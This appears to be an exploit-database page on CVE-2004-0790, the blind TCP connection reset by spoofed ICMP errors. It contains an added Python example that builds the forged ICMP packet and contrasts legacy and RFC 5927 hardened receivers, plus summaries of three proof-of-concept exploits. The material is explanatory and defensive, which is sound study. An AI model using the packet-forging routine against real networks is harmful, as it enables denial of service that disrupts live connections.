CVE-2004-0790
TCP/IP ICMP Error Handling - Blind Connection Reset Denial of Service
Title source: manual
Exploitation Summary
EIP tracks 3 public exploits for CVE-2004-0790. PoCs published by houseofdabus, Fernando Gont.
AI-analyzed exploit summary: This is a proof-of-concept exploit for CVE-2004-0790, demonstrating ICMP-based attacks against TCP connections. It allows an attacker to send crafted ICMP messages to reset TCP connections, slow down traffic, or consume system resources.
Description
Multiple TCP/IP and ICMP implementations allow remote attackers to cause a denial of service (reset TCP connections) via spoofed ICMP error messages, aka the "blind connection-reset attack." NOTE: CVE-2004-0790, CVE-2004-0791, and CVE-2004-1060 have been SPLIT based on different attacks; CVE-2005-0065, CVE-2005-0066, CVE-2005-0067, and CVE-2005-0068 are related identifiers that are SPLIT based on the underlying vulnerability. While CVE normally SPLITs based on vulnerability, the attack-based identifiers exist due to the variety and number of affected implementations and solutions that address the attacks instead of the underlying vulnerabilities.
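The following is an added example, written for this page; it is not EIP content and not the houseofdabus or Gont proof-of-concept code. It shows in Python what the blind connection-reset message described above looks like on the wire and why the counter-measures later standardised in RFC 5927 defeat it. The attacker forges an ICMP Destination Unreachable / Protocol Unreachable (type 3, code 2) error whose quoted payload names only the victim connection's 4-tuple, which is all RFC 792 requires; a legacy RFC 1122 receiver aborts the matching connection on that alone, while the hardened receiver additionally requires the quoted sequence number to lie in the send window (with 32-bit wraparound) and treats hard errors as soft errors in every synchronized state, not just ESTABLISHED. Addresses, ports, sequence numbers and the `Tcb`/`IcmpError` structures are constructed sample values, and the function names are this example's own.

```python
"""Blind connection reset via spoofed ICMP hard errors (CVE-2004-0790).

Added illustration; not code from the EIP page or the referenced PoCs.
All addresses, ports and sequence numbers are constructed sample values.
"""
import ipaddress
import struct
from dataclasses import dataclass

ICMP_DEST_UNREACH = 3
HARD_ERROR_CODES = (2, 3, 4)      # protocol unreachable, port unreachable, frag needed (RFC 1122 "hard")
IPPROTO_ICMP, IPPROTO_TCP = 1, 6
SYNCHRONIZED_STATES = {"ESTABLISHED", "FIN-WAIT-1", "FIN-WAIT-2", "CLOSE-WAIT",
                       "CLOSING", "LAST-ACK", "TIME-WAIT"}


def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum over 16-bit words; returns 0 when verifying a checksummed buffer."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def ipv4_header(src: str, dst: str, proto: int, payload_len: int) -> bytes:
    """Minimal 20-byte IPv4 header (no options) with a valid header checksum."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, 0, 0, 64, proto, 0,
                      ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    return hdr[:10] + struct.pack("!H", inet_checksum(hdr)) + hdr[12:]


def forge_icmp_reset(victim_src: str, victim_dst: str, sport: int, dport: int,
                     guessed_seq: int = 0) -> bytes:
    """Attacker's datagram: ICMP type 3 / code 2 quoting the victim connection.

    RFC 792 only requires the quoted IP header plus the first 8 bytes of the
    transport header (ports and sequence number). An off-path attacker knows
    or brute-forces the 4-tuple but not the 32-bit SEQ, so SEQ is a guess.
    """
    quoted = ipv4_header(victim_src, victim_dst, IPPROTO_TCP, 20) + struct.pack("!HHI", sport, dport, guessed_seq)
    icmp = struct.pack("!BBHI", ICMP_DEST_UNREACH, 2, 0, 0) + quoted
    icmp = icmp[:2] + struct.pack("!H", inet_checksum(icmp)) + icmp[4:]
    # The outer source address is arbitrary: ICMP errors legitimately arrive from any router on the path.
    return ipv4_header("198.51.100.1", victim_src, IPPROTO_ICMP, len(icmp)) + icmp


@dataclass(frozen=True)
class IcmpError:
    type: int
    code: int
    src: str        # quoted datagram's addresses, i.e. the victim connection as the receiver sees it
    dst: str
    sport: int
    dport: int
    seq: int


def parse_icmp_error(pkt: bytes) -> IcmpError:
    """Receiver side: verify the ICMP checksum and extract the quoted TCP 4-tuple and SEQ."""
    icmp = pkt[(pkt[0] & 0x0F) * 4:]
    if inet_checksum(icmp) != 0:
        raise ValueError("bad ICMP checksum")
    quoted = icmp[8:]
    if quoted[9] != IPPROTO_TCP:
        raise ValueError("quoted datagram is not TCP")
    qihl = (quoted[0] & 0x0F) * 4
    sport, dport, seq = struct.unpack("!HHI", quoted[qihl:qihl + 8])
    return IcmpError(icmp[0], icmp[1], str(ipaddress.IPv4Address(quoted[12:16])),
                     str(ipaddress.IPv4Address(quoted[16:20])), sport, dport, seq)


@dataclass
class Tcb:
    local: str
    remote: str
    lport: int
    rport: int
    state: str
    snd_una: int    # oldest unacknowledged sequence number
    snd_nxt: int    # next sequence number to be sent


def seq_in_send_window(seq: int, snd_una: int, snd_nxt: int) -> bool:
    """SND.UNA <= seq < SND.NXT, computed modulo 2^32 so wraparound is handled."""
    return ((seq - snd_una) & 0xFFFFFFFF) < ((snd_nxt - snd_una) & 0xFFFFFFFF)


def matches_connection(tcb: Tcb, err: IcmpError) -> bool:
    return (err.src, err.dst, err.sport, err.dport) == (tcb.local, tcb.remote, tcb.lport, tcb.rport)


def legacy_should_abort(tcb: Tcb, err: IcmpError) -> bool:
    """RFC 1122 behaviour: a hard error aborts the matching connection.
    Only the 4-tuple is checked, which is what makes the attack 'blind'."""
    return (matches_connection(tcb, err) and err.type == ICMP_DEST_UNREACH
            and err.code in HARD_ERROR_CODES)


def hardened_should_abort(tcb: Tcb, err: IcmpError) -> bool:
    """RFC 5927 counter-measures: the quoted SEQ must fall inside the send window,
    and in a synchronized state a hard error is treated as a soft error."""
    if not legacy_should_abort(tcb, err):
        return False
    if not seq_in_send_window(err.seq, tcb.snd_una, tcb.snd_nxt):
        return False        # off-path attacker now has to land an in-window 32-bit SEQ
    return tcb.state not in SYNCHRONIZED_STATES


def demo() -> dict:
    """Attack a long-lived session (constructed sample resembling a BGP peering)."""
    tcb = Tcb("192.0.2.10", "203.0.113.5", 40000, 179, "ESTABLISHED", snd_una=1000, snd_nxt=1500)
    err = parse_icmp_error(forge_icmp_reset("192.0.2.10", "203.0.113.5", 40000, 179))
    return {"legacy": legacy_should_abort(tcb, err), "hardened": hardened_should_abort(tcb, err)}


if __name__ == "__main__":
    print(demo())   # {'legacy': True, 'hardened': False}
```

`demo()` models the scenario that made this CVE severe: a long-lived session whose 4-tuple is predictable (well-known port on one side, a guessable ephemeral port on the other) is torn down by a single 56-byte packet on a legacy stack, while the hardened receiver ignores it. The hardened check still aborts on a genuine hard error received in SYN-SENT with a correct sequence number, so connection failures are still reported promptly.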
Exploits (3)
This is a proof-of-concept exploit for CVE-2004-0790, demonstrating ICMP-based attacks against TCP connections. It allows an attacker to send crafted ICMP messages to reset TCP connections, slow down traffic, or consume system resources.
This is a writeup describing multiple ICMP-based denial-of-service vulnerabilities (CVE-2004-0790, CVE-2004-0791, CVE-2004-1060) affecting various TCP/IP implementations. It explains blind connection-reset, ICMP Source Quench, and PMTUD attacks but does not include functional exploit code.
This exploit demonstrates a DoS vulnerability in Windows by crafting a malformed IP packet with an option size of 39, causing a crash due to an off-by-one error in IP option processing.